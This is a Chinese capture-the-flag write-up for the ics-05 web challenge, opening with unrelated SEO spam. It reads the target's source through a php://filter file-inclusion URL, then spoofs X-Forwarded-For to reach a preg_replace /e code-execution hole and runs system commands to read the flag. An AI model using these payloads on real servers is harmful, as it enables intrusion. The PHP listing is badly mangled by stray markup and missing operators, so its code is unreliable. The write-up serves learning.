杭州 网站设计制作,seo关键词优化软件怎么样,淘宝装修做代码的网站,开发一个淘宝app需要多少钱题目来源 攻防世界web高手进阶区ics-05#xff08;XCTF 4th-CyberEarth#xff09; 1.拿到题目以后#xff0c;发现是一个index.php的页面#xff0c;并且设备…没有显示完全#xff0c;此位置可疑。 2.源代码中发现?pageindex#xff0c;出现page这个get参数#xff0…题目来源 攻防世界web高手进阶区ics-05XCTF 4th-CyberEarth 1.拿到题目以后发现是一个index.php的页面并且设备…没有显示完全此位置可疑。 2.源代码中发现?pageindex出现page这个get参数联想到可能存在文件包含读源码的漏洞尝试读取index.php的页面源码
通过php内置协议直接读取代码
/index.php?pagephp://filter/readconvert.base64-encode/resourceindex.php
12
LFI漏洞的黑盒判断方法 单纯的从URL判断的话URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。 此处因为源码中有提示?pageindex,所以读一下index.php中的源码 3.进行base64解密
?php
error_reporting(0);session_start(); posix_setuid(1000);
? !DOCTYPE HTML html
head meta charset“utf-8” meta name“renderer” content“webkit” meta http-equiv“X-UA-Compatible” content“IEedge,chrome1” meta name“viewport” content“widthdevice-width, initial-scale1, maximum-scale1” link rel“stylesheet” href“layui/css/layui.css” media“all” title设备维护中心/title meta charset“utf-8” /head
body ul class“layui-nav” li class“layui-nav-item layui-this”a href?pageindex云平台设备维护中心/a/li /ul fieldset class“layui-elem-field layui-field-title” style“margin-top: 30px;” legend设备列表/legend /fieldset table class“layui-hide” id“test”/table script type“text/html” id“switchTpl” !– 这里的 checked 的状态只是演示 – input type“checkbox” name“sex” value{{d.id}} lay-skin“switch” lay-text“开|关” lay-filter“checkDemo” {{ d.id1 0003 ? ‘checked’ : ‘’ }} /script script src“layui/layui.js” charset“utf-8”/script script layui.use(‘table’, function() { var table layui.table, form layui.form; tablespan classtoken punctuation./spanspan classtoken functionrender/spanspan classtoken punctuation(/spanspan classtoken punctuation{/spanelemspan classtoken punctuation:/span span classtoken string#test/spanspan classtoken punctuation,/spanurlspan classtoken punctuation:/span span classtoken string/somrthing.json/spanspan classtoken punctuation,/spancellMinWidthspan classtoken punctuation:/span span classtoken number80/spanspan classtoken punctuation,/spancolsspan classtoken punctuation:/span span classtoken punctuation[/spanspan classtoken punctuation[/spanspan classtoken punctuation{/span typespan classtoken punctuation:/span span classtoken stringnumbers/span span classtoken punctuation}/spanspan classtoken punctuation,/spanspan classtoken punctuation{/span typespan classtoken punctuation:/span span classtoken stringcheckbox/span span classtoken punctuation}/spanspan classtoken punctuation,/spanspan classtoken punctuation{/span fieldspan classtoken punctuation:/span span classtoken stringid/spanspan classtoken punctuation,/span titlespan classtoken punctuation:/span span classtoken stringID/spanspan classtoken punctuation,/span widthspan classtoken punctuation:/span span classtoken number100/spanspan classtoken punctuation,/span unresizespan classtoken punctuation:/span span classtoken booleantrue/spanspan classtoken punctuation,/span sortspan classtoken punctuation:/span span classtoken booleantrue/span span classtoken punctuation}/spanspan classtoken punctuation,/spanspan classtoken punctuation{/span fieldspan classtoken punctuation:/span span classtoken stringname/spanspan classtoken punctuation,/span titlespan classtoken punctuation:/span span classtoken string设备名/spanspan classtoken punctuation,/span templetspan classtoken punctuation:/span span classtoken string#nameTpl/span span classtoken punctuation}/spanspan classtoken punctuation,/spanspan classtoken punctuation{/span fieldspan classtoken punctuation:/span span classtoken stringarea/spanspan classtoken punctuation,/span titlespan classtoken punctuation:/span span classtoken string区域/span span classtoken punctuation}/spanspan classtoken punctuation,/spanspan classtoken punctuation{/span fieldspan classtoken punctuation:/span span classtoken stringstatus/spanspan classtoken punctuation,/span titlespan classtoken punctuation:/span span classtoken string维护状态/spanspan classtoken punctuation,/span minWidthspan classtoken punctuation:/span span classtoken number120/spanspan classtoken punctuation,/span sortspan classtoken punctuation:/span span classtoken booleantrue/span span classtoken punctuation}/spanspan classtoken punctuation,/spanspan classtoken punctuation{/span fieldspan classtoken punctuation:/span span classtoken stringcheck/spanspan classtoken punctuation,/span titlespan classtoken punctuation:/span span classtoken string设备开关/spanspan classtoken punctuation,/span widthspan classtoken punctuation:/span span classtoken number85/spanspan classtoken punctuation,/span templetspan classtoken punctuation:/span span classtoken string#switchTpl/spanspan classtoken punctuation,/span unresizespan classtoken punctuation:/span span classtoken booleantrue/span span classtoken punctuation}/spanspan classtoken punctuation]/spanspan classtoken punctuation]/spanspan classtoken punctuation,/spanpagespan classtoken punctuation:/span span classtoken booleantrue/spanspan classtoken punctuation}/spanspan classtoken punctuation)/spanspan classtoken punctuation;/span
span classtoken punctuation}/spanspan classtoken punctuation)/spanspan classtoken punctuation;/span
/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;//spanscript/spanspan classtoken punctuationgt;/span/span
span classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanscript/spanspan classtoken punctuationgt;/span/spanspan classtoken script language-javascript
layuispan classtoken punctuation./spanspan classtoken functionuse/spanspan classtoken punctuation(/spanspan classtoken stringelement/spanspan classtoken punctuation,/span span classtoken keywordfunction/spanspan classtoken punctuation(/spanspan classtoken punctuation)/span span classtoken punctuation{/spanspan classtoken keywordvar/span element span classtoken operator/span layuispan classtoken punctuation./spanelementspan classtoken punctuation;/span span classtoken comment//导航的hover效果、二级菜单等功能需要依赖element模块/spanspan classtoken comment//监听导航点击/spanelementspan classtoken punctuation./spanspan classtoken functionon/spanspan classtoken punctuation(/spanspan classtoken stringnav(demo)/spanspan classtoken punctuation,/span span classtoken keywordfunction/spanspan classtoken punctuation(/spanelemspan classtoken punctuation)/span span classtoken punctuation{/spanspan classtoken comment//console.log(elem)/spanlayerspan classtoken punctuation./spanspan classtoken functionmsg/spanspan classtoken punctuation(/spanelemspan classtoken punctuation./spanspan classtoken functiontext/spanspan classtoken punctuation(/spanspan classtoken punctuation)/spanspan classtoken punctuation)/spanspan classtoken punctuation;/spanspan classtoken punctuation}/spanspan classtoken punctuation)/spanspan classtoken punctuation;/span
span classtoken punctuation}/spanspan classtoken punctuation)/spanspan classtoken punctuation;/span
/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;//spanscript/spanspan classtoken punctuationgt;/span/span?php
$page $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) { ?
span classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/span
span classtoken tagspan classtoken tagspan classtoken punctuationlt;/spandiv/spanspan classtoken style-attr language-cssspan classtoken attr-name span classtoken attr-namestyle/span/spanspan classtoken punctuation/spanspan classtoken attr-valuespan classtoken propertytext-align/spanspan classtoken punctuation:/spancenter/spanspan classtoken punctuation/span/spanspan classtoken punctuationgt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanp/span span classtoken attr-nameclass/spanspan classtoken attr-valuespan classtoken punctuation/spanspan classtoken punctuation/spanleadspan classtoken punctuation/span/spanspan classtoken punctuationgt;/span/spanspan classtoken prologlt;?php echo $page; die();?gt;/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;//spanp/spanspan classtoken punctuationgt;/span/span
span classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/span?php
}else{
? br /br /br /br / div style“text-align:center” p class“lead” ?php if (strpos($page, input) gt; 0) {die();}if (strpos($page, ta:text) gt; 0) {die();}if (strpos($page, text) gt; 0) {die();}if ($page index.php) {die(Ok);}include($page);die();?gt;/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;//spanp/spanspan classtoken punctuationgt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/spanspan classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuation/gt;/span/span?php }}
//方便的实现输入输出的功能,正在开发中的功能只能内部人员测试
if ($_SERVER[‘HTTP_X_FORWARDED_FOR’] ‘127.0.0.1’) {
echo lt;br gt;Welcome My Admin ! lt;br gt;;$pattern $_GET[pat];
$replacement $_GET[rep];
$subject $_GET[sub];if (isset($pattern) amp;amp; isset($replacement) amp;amp; isset($subject)) {preg_replace($pattern, $replacement, $subject);
}else{die();
}} ? /body /html 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137
得到源码后开始审计
//方便的实现输入输出的功能,正在开发中的功能只能内部人员测试
if ($_SERVER[HTTP_X_FORWARDED_FOR] 127.0.0.1) {
echo span classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuationgt;/span/spanWelcome My Admin ! span classtoken tagspan classtoken tagspan classtoken punctuationlt;/spanbr/span span classtoken punctuationgt;/span/span;$pattern $_GET[pat];
$replacement $_GET[rep];
$subject $_GET[sub];if (isset($pattern) amp;amp; isset($replacement) amp;amp; isset($subject)) {preg_replace($pattern, $replacement, $subject);
}else{die();
}} 123456789101112131415
此处存在preg_replace函数尝试测试是否存在命令注入漏洞 函数作用搜索subject中匹配pattern的部分 以replacement进行替换。 此处明显考察的是preg_replace 函数使用 /e 模式导致代码执行的问题。也就是说pat值和sub值相同rep的代码就会执行。 XFF改成127.0.0.1之后GET进来三个参数。这里调用了preg_replace函数。并且没有对pat进行过滤所以可以传入/e触发漏洞,触发后replacement的语句是会得到执行的首先执行一下phpinfo 执行成功 然后使用system(“ls”)尝试获取文件目录 使用cd进入目标文件 system(“cds3chahahaDir/flag%26%26ls”) 为了避免编码问题此处不能使用空格隔开而是使用%26%26为意思是当前面命令执行成功时继续执行后面的命令。 最后使用cat命令获取flag.php中的文件 成功获取flag。
总结
思路建立 1.由?pageindex联想到可能存在文件包含读源码的漏洞,使用/index.php?pagephp://filter/readconvert.base64-encode/resourceindex.php获取index.php中源码 2.读取源码后进行代码审计。发现存在preg_replace函数尝试利用命令执行漏洞获取到文件目录最终找到目标文件 3.读取存在flag的文件得到flag。 主要技能点 文件包含漏洞 PHP伪协议中的 php://filter preg_replace函数引发的命令执行漏洞
